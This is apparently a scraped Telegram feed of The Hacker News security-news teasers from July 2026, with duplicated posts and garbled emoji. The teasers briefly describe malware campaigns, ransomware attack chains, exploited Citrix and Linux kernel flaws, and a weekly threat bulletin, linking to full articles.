π AI agents donβt trigger leaver events.
No HR record.
No manager.
No offboarding date.
IGA tools may only see a service account while API access, OAuth grants, and stale credentials drift outside the human identity lifecycle.
Where the model breaks: https://thehackernews.com/2026/07/identity-lifecycle-management.html
No HR record.
No manager.
No offboarding date.
IGA tools may only see a service account while API access, OAuth grants, and stale credentials drift outside the human identity lifecycle.
Where the model breaks: https://thehackernews.com/2026/07/identity-lifecycle-management.html
π2
ToddyCatβs Umbrij can turn an active Gmail session into Google API access.
Experts say it launches Chrome or Edge in headless mode, grabs an OAuth authorization code, and lets operators exchange it for an access token.
How the STRD attack chain works: https://thehackernews.com/2026/07/toddycat-linked-umbrij-malware-abuses.html
Experts say it launches Chrome or Edge in headless mode, grabs an OAuth authorization code, and lets operators exchange it for an access token.
How the STRD attack chain works: https://thehackernews.com/2026/07/toddycat-linked-umbrij-malware-abuses.html
π₯5
#ThreatsDay Bulletin is live, and this weekβs threats were quiet, weird, and too easy to miss.
π€ Stolen AI compute
π¨ BlueHammer ransomware
π Apple email flaw
π¨ Fake INTERPOL ransomware
π ClickFix defenses
π BeepRAT espionage
𧬠Millennium RAT
π£ UNC1151 phishing
π AI search hijack
π₯ Teams bot controls
π§ GPT-5.6 Sol
π΅οΈ UNC5792 reward
π§© Prompt injection
πΆοΈ Anthropic tracking
π± Device-aware phishing
ποΈ Amazon FTC fine
ποΈ Claude sandbox root
Read the full roundup: https://thehackernews.com/2026/07/threatsday-ai-compute-hijacking-apple.html
π€ Stolen AI compute
π¨ BlueHammer ransomware
π Apple email flaw
π¨ Fake INTERPOL ransomware
π ClickFix defenses
π BeepRAT espionage
𧬠Millennium RAT
π£ UNC1151 phishing
π AI search hijack
π₯ Teams bot controls
π§ GPT-5.6 Sol
π΅οΈ UNC5792 reward
π§© Prompt injection
πΆοΈ Anthropic tracking
π± Device-aware phishing
ποΈ Amazon FTC fine
ποΈ Claude sandbox root
Read the full roundup: https://thehackernews.com/2026/07/threatsday-ai-compute-hijacking-apple.html
π2
π¨ Update - Citrix CVE-2026-8451 is now under active exploitation, less than 24 hours after disclosure.
A Frankfurt IP hit sensors for 5 hours, delivering the watchTowr exploit only after a 200 OK response and skipping 404s.
Learn the malformed SAML exploit path works: https://thehackernews.com/2026/07/citrix-patches-six-netscaler-flaws.html
A Frankfurt IP hit sensors for 5 hours, delivering the watchTowr exploit only after a 200 OK response and skipping 404s.
Learn the malformed SAML exploit path works: https://thehackernews.com/2026/07/citrix-patches-six-netscaler-flaws.html
π₯6
π Ransomware crews are stacking three ugly paths into enterprise networks.
πΈ Anubis: Citrix Bleed 2
πΈ The Gentlemen: Go backdoor + BYOVD
πΈ VECT/TeamPCP: supply-chain credential theft
How the attack paths connect: https://thehackernews.com/2026/07/ransomware-groups-turn-to-citrix-bleed.html
πΈ Anubis: Citrix Bleed 2
πΈ The Gentlemen: Go backdoor + BYOVD
πΈ VECT/TeamPCP: supply-chain credential theft
How the attack paths connect: https://thehackernews.com/2026/07/ransomware-groups-turn-to-citrix-bleed.html
π₯8
π₯ Google disrupted #NetNut, a proxy network spanning at least 2 million home devices.
In one June week, GTIG saw 316 threat clusters using suspected NetNut exit nodes to hide location and guess passwords.
The simple risk: your home IP becomes someone elseβs relay.
Learn more: https://thehackernews.com/2026/07/google-disrupts-netnut-residential.html
In one June week, GTIG saw 316 threat clusters using suspected NetNut exit nodes to hide location and guess passwords.
The simple risk: your home IP becomes someone elseβs relay.
Learn more: https://thehackernews.com/2026/07/google-disrupts-netnut-residential.html
π₯7π4π1
π¨ PamStealer targets Mac users through fake Maccy sites.
A compiled AppleScript stages a Rust stealer that validates the entered login password through PAM, then targets browsers, crypto wallets, iCloud Keychain, and clipboard content.
How the attack chain works: https://thehackernews.com/2026/07/pamstealer-uses-fake-maccy-sites-and.html
A compiled AppleScript stages a Rust stealer that validates the entered login password through PAM, then targets browsers, crypto wallets, iCloud Keychain, and clipboard content.
How the attack chain works: https://thehackernews.com/2026/07/pamstealer-uses-fake-maccy-sites-and.html
β‘4
β οΈ A member of the EU committee investigating spyware abuse was hacked with Pegasus while serving on it.
Citizen Lab says Stelios Kouloglouβs #iPhone was compromised in Oct. 2022 and Mar. 2023, likely via Appleβs HomeKit zero-click exploit.
Attackers could have accessed PEGA documents and deliberations.
Details: https://thehackernews.com/2026/07/european-parliament-member.html
Citizen Lab says Stelios Kouloglouβs #iPhone was compromised in Oct. 2022 and Mar. 2023, likely via Appleβs HomeKit zero-click exploit.
Attackers could have accessed PEGA documents and deliberations.
Details: https://thehackernews.com/2026/07/european-parliament-member.html
π5π€2π1
This media is not supported in your browser
VIEW IN TELEGRAM
#ThreatsDay this week reads like attackers opened the junk drawer of the internet and found everything still plugged in:
π§ exposed AI compute
π§ email privacy gaps
π§© fake browser extensions
π€ meeting bots
π clipboard tricks
π‘οΈ Defender flaws
π fake INTERPOL ransomware
Just an Empire State Building-sized amount of trust left unattended - https://thehackernews.com/2026/07/threatsday-ai-compute-hijacking-apple.html
π§ exposed AI compute
π§ email privacy gaps
π§© fake browser extensions
π€ meeting bots
π clipboard tricks
π‘οΈ Defender flaws
π fake INTERPOL ransomware
Just an Empire State Building-sized amount of trust left unattended - https://thehackernews.com/2026/07/threatsday-ai-compute-hijacking-apple.html
π₯4π€2
β οΈ Armored Likho targeted power and government agencies.
Kaspersky says the attacks span Russia, Brazil, and Kazakhstan, using BusySnake Stealer, GitHub-hosted payloads, Go2Tunnel reverse tunneling, and patched CVE-2025-9491 LNK abuse.
How the stealer chain works: https://thehackernews.com/2026/07/armored-likho-targets-government.html
Kaspersky says the attacks span Russia, Brazil, and Kazakhstan, using BusySnake Stealer, GitHub-hosted payloads, Go2Tunnel reverse tunneling, and patched CVE-2025-9491 LNK abuse.
How the stealer chain works: https://thehackernews.com/2026/07/armored-likho-targets-government.html
π₯4π3π€2
π Six malicious npm packages mimicked Rollup polyfill tools.
Experts link them to North Korea-linked actors. They used hidden install-time execution and JSONKeeper fetches to load payloads for remote access and browser, wallet, cloud, SSH, and npm secret theft.
Read: https://thehackernews.com/2026/07/north-korea-linked-npm-packages-mimic.html
Experts link them to North Korea-linked actors. They used hidden install-time execution and JSONKeeper fetches to load payloads for remote access and browser, wallet, cloud, SSH, and npm secret theft.
Read: https://thehackernews.com/2026/07/north-korea-linked-npm-packages-mimic.html
π Avalon turns a PDF-themed .LNK into CrownX ransomware.
Proton Drive β ISO image β MSBuild β ETW tampering β HTTPS payload.
By the ransom note, credentials, C2, and recovery disruption are already in play.
Inside the attack chain: https://thehackernews.com/2026/07/new-avalon-malware-framework-packs.html
Proton Drive β ISO image β MSBuild β ETW tampering β HTTPS payload.
By the ransom note, credentials, C2, and recovery disruption are already in play.
Inside the attack chain: https://thehackernews.com/2026/07/new-avalon-malware-framework-packs.html
This media is not supported in your browser
VIEW IN TELEGRAM
β‘ New "Bad Epoll" (CVE-2026-46242) vulnerability affects #Linux 6.4+ kernels and may reach newer #Android devices.
It can turn a local user into root; the PoC hit 99% reliability and may trigger from Chromeβs renderer sandbox.
π Read how the bug works: https://thehackernews.com/2026/07/new-bad-epoll-linux-kernel-flaw-lets.html
It can turn a local user into root; the PoC hit 99% reliability and may trigger from Chromeβs renderer sandbox.
π Read how the bug works: https://thehackernews.com/2026/07/new-bad-epoll-linux-kernel-flaw-lets.html
π±3π1π€―1
π New UNPATCHED FatFs vulnerabilities hit a filesystem library bundled into potentially MILLIONS of embedded devices.
Malformed USB drives, SD cards, or update files can trigger memory corruption, crashes, leaks, or hangs.
Read details here: https://thehackernews.com/2026/07/unpatched-flaws-disclosed-in-filesystem.html
Malformed USB drives, SD cards, or update files can trigger memory corruption, crashes, leaks, or hangs.
Read details here: https://thehackernews.com/2026/07/unpatched-flaws-disclosed-in-filesystem.html
π₯2